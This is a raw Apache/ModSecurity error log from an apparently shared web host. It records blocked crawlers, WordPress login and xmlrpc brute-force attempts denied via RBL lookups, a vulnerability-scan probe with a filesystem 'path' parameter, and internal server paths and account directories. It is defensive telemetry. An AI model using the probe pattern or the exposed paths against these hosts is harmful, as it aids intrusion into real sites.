[Tue May 26 18:15:34.394615 2026] [security2:error] [pid 973439:tid 973442] [remote 176.31.139.2:48168] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahWV7gBg9mKRpdEFs3CFWwAAdgI"]
[Tue May 26 18:15:34.394822 2026] [security2:error] [pid 973439:tid 973687] [client 176.31.139.2:48168] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.athelstan.org.in"] [uri "/robots.txt"] [unique_id "ahWV7gBg9mKRpdEFs3CFWwAAdgI"]
[Tue May 26 18:15:34.636614 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:58406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV7gBg9mKRpdEFs3CFXQAAABA"]
[Tue May 26 18:15:34.636773 2026] [security2:error] [pid 973439:tid 973585] [client 82.76.238.33:58406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV7gBg9mKRpdEFs3CFXQAAABA"]
[Tue May 26 18:15:36.581538 2026] [security2:error] [pid 973439:tid 973505] [remote 54.39.210.174:50636] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.athelstan.org.in"] [uri "/"] [unique_id "ahWV8ABg9mKRpdEFs3CFlQAAXEE"]
[Tue May 26 18:15:36.581705 2026] [security2:error] [pid 973439:tid 973661] [client 54.39.210.174:50636] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.athelstan.org.in"] [uri "/"] [unique_id "ahWV8ABg9mKRpdEFs3CFlQAAXEE"]
[Tue May 26 18:15:36.665756 2026] [security2:error] [pid 973439:tid 973591] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV7wBg9mKRpdEFs3CFggAAABY"]
[Tue May 26 18:15:38.189652 2026] [security2:error] [pid 973439:tid 973682] [client 74.7.175.186:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.doyecpa.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWV8gBg9mKRpdEFs3CFxgAAAHE"]
[Tue May 26 18:15:38.190202 2026] [security2:error] [pid 973439:tid 973604] [client 74.7.175.186:34114] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.doyecpa.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWV8gBg9mKRpdEFs3CFxAAAIws"]
[Tue May 26 18:15:38.691519 2026] [security2:error] [pid 973439:tid 973581] [client 66.249.93.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWV8gBg9mKRpdEFs3CF0QAAAAw"]
[Tue May 26 18:15:39.237684 2026] [security2:error] [pid 973439:tid 973621] [client 190.185.108.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV8wBg9mKRpdEFs3CF7wAAADQ"], referer: https://www.anujtradingco.com/
[Tue May 26 18:15:39.273612 2026] [security2:error] [pid 973439:tid 973653] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV8gBg9mKRpdEFs3CF0gAAAFQ"]
[Tue May 26 18:15:40.080366 2026] [security2:error] [pid 973439:tid 973569] [client 190.185.108.171:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWV9ABg9mKRpdEFs3CGCQAAAAA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1471757&moderation-hash=9cfbb804ff1b9d4869a2d8346f8fb92c
[Tue May 26 18:15:40.781395 2026] [security2:error] [pid 973439:tid 973629] [client 14.166.17.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV8wBg9mKRpdEFs3CGBAAAADw"]
[Tue May 26 18:15:41.868867 2026] [security2:error] [pid 973439:tid 973657] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV9ABg9mKRpdEFs3CGJwAAAFg"]
[Tue May 26 18:15:44.639174 2026] [security2:error] [pid 973439:tid 973593] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV9wBg9mKRpdEFs3CGdgAAABg"]
[Tue May 26 18:15:45.496050 2026] [security2:error] [pid 973439:tid 973658] [client 82.76.238.33:58846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV-QBg9mKRpdEFs3CGrgAAAFk"]
[Tue May 26 18:15:45.496551 2026] [security2:error] [pid 973439:tid 973658] [client 82.76.238.33:58846] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWV-QBg9mKRpdEFs3CGrgAAAFk"]
[Tue May 26 18:15:47.789835 2026] [security2:error] [pid 973439:tid 973569] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV-wBg9mKRpdEFs3CG0AAAAAA"]
[Tue May 26 18:15:49.296406 2026] [security2:error] [pid 973439:tid 973672] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV_ABg9mKRpdEFs3CG8QAAAGc"]
[Tue May 26 18:15:51.415052 2026] [security2:error] [pid 973439:tid 973616] [client 45.132.227.138:54903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWV_wBg9mKRpdEFs3CHMQAAAC8"]
[Tue May 26 18:15:51.558576 2026] [security2:error] [pid 973439:tid 973695] [client 45.132.227.123:41493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 123.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWV_wBg9mKRpdEFs3CHLwAAAH4"]
[Tue May 26 18:15:52.518892 2026] [security2:error] [pid 973439:tid 973686] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWV_wBg9mKRpdEFs3CHOAAAAHU"]
[Tue May 26 18:15:54.928631 2026] [security2:error] [pid 973439:tid 973685] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWAQBg9mKRpdEFs3CHcQAAAHQ"]
[Tue May 26 18:15:55.831279 2026] [security2:error] [pid 973439:tid 973619] [client 85.208.96.210:35282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWWAwBg9mKRpdEFs3CHmwAAADI"]
[Tue May 26 18:15:55.831415 2026] [security2:error] [pid 973439:tid 973619] [client 85.208.96.210:35282] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWWAwBg9mKRpdEFs3CHmwAAADI"]
[Tue May 26 18:15:56.601408 2026] [core:crit] [pid 973439:tid 973611] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:15:56.734154 2026] [security2:error] [pid 973439:tid 973569] [client 114.119.155.224:39455] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWWBABg9mKRpdEFs3CHuwAAAAA"], referer: http://newdental.com.co/?ucci/5638190479063516l13a/adefeg29781a.hulloa
[Tue May 26 18:15:56.762977 2026] [core:crit] [pid 973439:tid 973593] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:15:56.904399 2026] [core:crit] [pid 973439:tid 973631] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:15:57.038618 2026] [proxy:error] [pid 973439:tid 973657] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:57.038698 2026] [proxy_http:error] [pid 973439:tid 973657] [client 205.210.31.132:64320] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:57.039577 2026] [proxy:error] [pid 973439:tid 973657] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:15:57.039614 2026] [proxy_http:error] [pid 973439:tid 973657] [client 205.210.31.132:64320] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:15:57.118910 2026] [security2:error] [pid 973439:tid 973687] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWBABg9mKRpdEFs3CHpwAAAHY"]
[Tue May 26 18:16:00.781165 2026] [security2:error] [pid 973439:tid 973662] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWBwBg9mKRpdEFs3CIHQAAAF0"]
[Tue May 26 18:16:00.955069 2026] [core:crit] [pid 973439:tid 973597] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:16:01.371132 2026] [security2:error] [pid 973439:tid 973482] [remote 94.76.235.103:53202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWWCQBg9mKRpdEFs3CIPQAAXyo"]
[Tue May 26 18:16:01.957351 2026] [security2:error] [pid 973439:tid 973578] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWCQBg9mKRpdEFs3CIPAAAAAk"]
[Tue May 26 18:16:02.172216 2026] [security2:error] [pid 973439:tid 973624] [client 103.240.99.165:59934] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWWCQBg9mKRpdEFs3CIWAAAADc"], referer: https://www.cagmedya.com/kutahya-web-tasarim/
[Tue May 26 18:16:04.993570 2026] [security2:error] [pid 973439:tid 973626] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWDABg9mKRpdEFs3CIkgAAADk"]
[Tue May 26 18:16:07.488153 2026] [security2:error] [pid 973439:tid 973657] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWDwBg9mKRpdEFs3CI2QAAAFg"]
[Tue May 26 18:16:07.749212 2026] [core:crit] [pid 973439:tid 973637] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:16:10.232467 2026] [security2:error] [pid 973439:tid 973667] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWEQBg9mKRpdEFs3CJKAAAAGI"]
[Tue May 26 18:16:10.511254 2026] [security2:error] [pid 973439:tid 973603] [client 64.31.3.126:44088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.3.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWWEgBg9mKRpdEFs3CJOQAAACI"], referer: https://www.cagmedya.com
[Tue May 26 18:16:11.668092 2026] [security2:error] [pid 973439:tid 973611] [client 64.31.3.126:35125] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWWEwBg9mKRpdEFs3CJYQAAACo"], referer: https://www.cagmedya.com
[Tue May 26 18:16:12.431287 2026] [security2:error] [pid 973439:tid 973601] [client 103.105.76.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWEwBg9mKRpdEFs3CJZQAAACA"]
[Tue May 26 18:16:12.896835 2026] [security2:error] [pid 973439:tid 973576] [client 64.31.3.126:18140] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWWFABg9mKRpdEFs3CJhQAAAAc"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 18:16:13.210919 2026] [security2:error] [pid 973439:tid 973593] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWFABg9mKRpdEFs3CJdwAAABg"]
[Tue May 26 18:16:14.001224 2026] [security2:error] [pid 973439:tid 973566] [remote 195.250.23.247:35354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWWFQBg9mKRpdEFs3CJnQAAI34"]
[Tue May 26 18:16:15.277135 2026] [security2:error] [pid 973439:tid 973599] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWFgBg9mKRpdEFs3CJrQAAAB4"]
[Tue May 26 18:16:17.669307 2026] [security2:error] [pid 973439:tid 973642] [client 74.7.244.9:48114] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "dassmerchandise.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWWGQBg9mKRpdEFs3CJ_gAASXE"]
[Tue May 26 18:16:18.045636 2026] [autoindex:error] [pid 973439:tid 973550] [remote 74.7.227.176:34496] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:16:18.161744 2026] [security2:error] [pid 973439:tid 973686] [client 157.55.39.200:14816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWGgBg9mKRpdEFs3CKDgAAAHU"]
[Tue May 26 18:16:18.840397 2026] [security2:error] [pid 973439:tid 973694] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWGABg9mKRpdEFs3CJ6QAAAH0"]
[Tue May 26 18:16:19.871789 2026] [security2:error] [pid 973439:tid 973535] [remote 18.190.7.192:43856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWWGwBg9mKRpdEFs3CKMAAAHl8"]
[Tue May 26 18:16:20.055329 2026] [autoindex:error] [pid 973439:tid 973684] [client 199.45.155.106:10868] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:16:21.044737 2026] [security2:error] [pid 973439:tid 973634] [client 64.31.3.126:14471] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWWHABg9mKRpdEFs3CKVQAAAEE"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 18:16:21.244169 2026] [security2:error] [pid 973439:tid 973694] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWHABg9mKRpdEFs3CKTQAAAH0"]
[Tue May 26 18:16:21.465078 2026] [security2:error] [pid 973439:tid 973445] [remote 45.32.67.165:58614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWHQBg9mKRpdEFs3CKYQAAfwU"]
[Tue May 26 18:16:22.110226 2026] [security2:error] [pid 973439:tid 973448] [remote 123.30.233.13:34706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWHQBg9mKRpdEFs3CKawAAOgg"]
[Tue May 26 18:16:22.153218 2026] [security2:error] [pid 973439:tid 973541] [remote 18.190.7.192:43856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWWHgBg9mKRpdEFs3CKdwAAHGU"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:16:24.161418 2026] [security2:error] [pid 973439:tid 973696] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWHwBg9mKRpdEFs3CKmQAAAH8"]
[Tue May 26 18:16:25.303145 2026] [security2:error] [pid 973439:tid 973467] [remote 74.7.241.58:47094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWWIQBg9mKRpdEFs3CKywAAQRs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:16:26.320709 2026] [security2:error] [pid 973439:tid 973655] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWIQBg9mKRpdEFs3CKygAAAFY"]
[Tue May 26 18:16:27.161764 2026] [security2:error] [pid 973439:tid 973571] [client 43.173.173.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWWIwBg9mKRpdEFs3CK9gAAAAI"]
[Tue May 26 18:16:28.467631 2026] [security2:error] [pid 973439:tid 973671] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWIwBg9mKRpdEFs3CLCwAAAGY"]
[Tue May 26 18:16:31.185654 2026] [security2:error] [pid 973439:tid 973630] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWJgBg9mKRpdEFs3CLVQAAAD0"]
